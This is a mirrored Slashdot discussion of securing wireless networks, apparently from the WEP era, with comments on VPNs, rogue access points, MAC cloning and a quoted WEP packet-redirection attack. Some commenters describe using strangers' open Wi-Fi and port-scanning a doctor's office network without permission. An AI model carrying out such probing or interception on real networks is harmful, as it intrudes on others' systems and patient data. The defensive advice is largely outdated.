Slashdot Mirror
Risk Management of Wireless Networks
An anonymous reader writes "As wireless becomes a bigger part of our networks, those of us charged with maintaining them find ourselves also responsible for keeping drive-by script kiddies with a Pringles can out. BankInfoSecurity.com is running an excellent article on identifying and mitigating risks on wireless networks. The article was written by members of the Office of the Comptroller of the Currency (OCC) for banks, but it's applicable to any network environment and clearly lays out all the key steps to protecting wireless systems." There's nothing new here, really, but it's a good overview of issues to keep in mind when building a wireless net, as well as a good security plan starting point.
Just have your wireless devices set to a DMZ that opens to one page, a VPN portal. Then you have a wireless connection, with VPN providing your security. Voila...a little bit more cumbersome, but isn't your network integrity worth it?
The switch has all inline power ports to power the APs, which may or may not be directly connected. Each AP automatically creates an IPSEC tunnel back to the switch. The switch supports every auth method under the sun (EAP-TTLS being generally most secure) when combined with 802.1x (which includes dynamic WEP/WPA 2.0). The switch itself supports a per-user firewall, integrated, signature-based IDS (that detects things like monkeyjack and netstumbler), and terminates 2 Gbps of IPSEC (which includes the IPSEC client running on each user's machine.
All of this for a couple of grand. Secure wireless is possible, the market is demanding it, and vendors have come to meet that demand.
I agree 100%.
The hoopla about physical access security obscures the point that *all* internet traffic and most intranet traffic is viewable by others. It is a good idea to assume that all your networks are open and to use VPN, ssh, etc. to secure your data. And *never* send plain-text passwords.
If you lock your data down under this assumption (that all network traffic may be intercepted) the impetus for clunky and insecure wireless access restrictions is much diminished.
used to use WiFi between it's checkouts and inventory system. No encryption, SSID broadcasts were switched on and everything, to the extent that we used to sit in the car park and surf the web via their connection for hours on end on Saturday afternoons.
This was a good 18 months ago though. I'd assume they've changed it now. I certainly made a point of telling them why I wasn't shopping there any more, rather than doing the whole 'your network is totally unsecure and I found out why' thing and getting myself arrested...
If you are responsible for a company's security, you should regularly search for wireless nodes within your organization which you are not aware of WHETHER OR NOT you are using wireless as policy.
I have been asked to assess companies and offered a wireless audit. They said "we don't use wireless". I checked anyway, and it turned out they DID have wireless (but didn't know about it) thanks to in one instance, a laptop acting as an AP and in another, a sysadmin who figured he'd plug in a wireless AP with built-in switch instead of a hub or switch, and wireless was turned on. This is all the more problematic as the laptop and wireless device were both inside the firewall and therefore represented a major hole.
Intruders may also leave wireless devices behind to save coming onto the site for subsequent eavesdropping. That is, they will bring your network to them rather than bringing themselves to your network.
In any case, fire up your stumbling application, a GOOD antenna and have a look around your own environment. You may be surprised what you see!
Do you or your partner snore? - Visit www.snoring.com.au
So why not having to VPN in from the Wifi network ? What would be the difference from being at home on a crappy Linksys access point ?
the government will ever allow sensitive or classified information to go on a wireless link, even if it is "secured".. there's just too much freedom in the air between origin and destination.
Drat, what are we going to do with the $8.5 billion we already spent on the satelites?
But what about your neighbors? From my office upstairs in my house I can see 9 wireless networks. 24 hours to get enough data? That's easy. That is what concerns me. You never know who you live around and they have all the time they want to break it.
From what I've seen most of my neighbors don't use their connect enough to get enough traffic but 1 or 2 do. In a test of AirSnort I got close to 1K interesting packets in 2 days for one network. Given a week or two of a system sitting in a corner I bet I could break it.
This is the main reason I totally dropped wireless in the new house. I had it wired with CAT5 for data everywhere I'd need it. I work a lot from home and have a site-to-site VPN and don't want to compromise that.
Your suggestions are good... But turning off SSID broadcast is overrated. As soon as a client associates I can get that. As soon as they associate I can get a MAC address to clone.
This subject deserves mod points. I don't have any today, so you have to suffer through one of my posts.
If you are running a business with wireless, and you care at all about security, and you allow anything to go over that link unencrypted, you're insane.
The only IP address that should be reachable over your wireless network is the IP address of your IPSec VPN gateway.
Most APs will accept re-addressed packets. This means the perp doesn't have to even crack the keys. All he needs to do is readdress packets to himself over the net and send them back to your AP. Your AP will dutifully decrypt them and send them out over the internet. Port blocked? Use a different one - you're re-addressing the packets anyway.
A.
...bringing you cynical quips since 1998
My first thought was the status screen part of the maintenance / configuration web interface to my router. Have it up, refresh it from time to time and just look at all the MAC addresses. Any clown that can't become familiar enough with 20-30 MAC addresses that are legit to memorize them, thus indentifying unwelcome intruders by looking at this screen ... doesn't belong in IT.
... because anybody that can memorize 23 MAC addresses probably isn't going to have too much trouble burning through a 56bit key to get his hands on some of it.
And yes, that is one of the things I check from time to time when I want to reassure myself that my system hasn't been compromised.
But you are right, banks probably shouldn't be using wireless, nor should they allow their home users VPN'ing in to use wireless. WEP is strong enough to protect my pr0n and warez, but it isn't strong enough (IMHO) to protect $14.6B worth of assets
Glonoinha the MebiByte Slayer
(not only do you have to read my posts, you have to read me replying to my own post).
I realized that I over-simplified the re-addressing problem.
From the UCLA paper:
"Active Attack from Both Ends
The previous attack can be extended further to decrypt arbitrary traffic. In this case, the attacker makes a guess about not the contents, but rather the headers of a packet. This information is usually quite easy to obtain or guess; in particular, all that is necessary to guess is the destination IP address. Armed with this knowledge, the attacker can flip appropriate bits to transform the destination IP address to send the packet to a machine he controls, somewhere in the Internet, and transmit it using a rogue mobile station. Most wireless installations have Internet connectivity; the packet will be successfully decrypted by the access point and forwarded unencrypted through appropriate gateways and routers to the attacker's machine, revealing the plaintext. If a guess can be made about the TCP headers of the packet, it may even be possible to change the destination port on the packet to be port 80, which will allow it to be forwarded through most firewalls."
A.
...bringing you cynical quips since 1998
Yeah, I see a lot of people stuck like that with insecure POP, and a lot of people who use the same password for their home account (which is almost always POP only) as they do for their work account. Bad bad bad.
One thing you could do, if you want to be a bit more secure, is to port forward port 110 using SSH to a server at home. Your POP password is still going out in the clear then, but it's going in the clear from your house, which is presumably more secure that going out over open wireless.
the tunnel would be something like this:
ssh -L 110:www.yourhomeserver.com:110 -f -N yourname@www.yourhomeserver.com
Here's a howto that goes into a little more depth.
- "When you want something with all your heart, the entire universe conspires to give it to you" -Paulo Coelho
I gave a friend of mine a wireless card for her laptop as a graduation present, the idea being she could use it when she's at coffee shops offering wireless connections, or in grad school on campus (she doesn't subscribe to broadband). As it turns out, she has a minimum of 4 options to connect to the internet from her apartment at any given time thanks to her careless neighbors.
What changed under Obama? Nothing Good
He'd left it open to facilitate use by visitors, but no longer.
Mencken had it right. So glad that's old news.
many ISPs do not offer any other option
Use your ISP for connectivity and spend $30-35 a year for a better mail service.
For less than 3 bucks a month, you might even get HTTPS webmail thrown in ... some extra storage ... and one of those "lifetime" domain names that gives you some flexibility regarding additional accounts and spam control.
If email matters to you, it is doubtful you can find an ISP for twice the price that gives you mail security and your current level of non-mail speed and features (how most people pick their provders).
So, for kicks, I took my libretto to the office on my next visit and fired up kismet.
They are wide open. No WEP, Windoze boxes (including the domain controllers) all easily accessible. A quick port scan showed all types of vulnerable services and such. I did not take the time to go further, but figure that getting patient records would not be too difficult.
From the port scans, it seems that this small office is also on the same subnet as other businesses in the area. WTF???
So what is one to do? I dare not tell them what I found, what with the risk of being labeled a terrorist and all. I thought that an anonymous letter to them might be best. But how can I be sure that they ever fix the problem?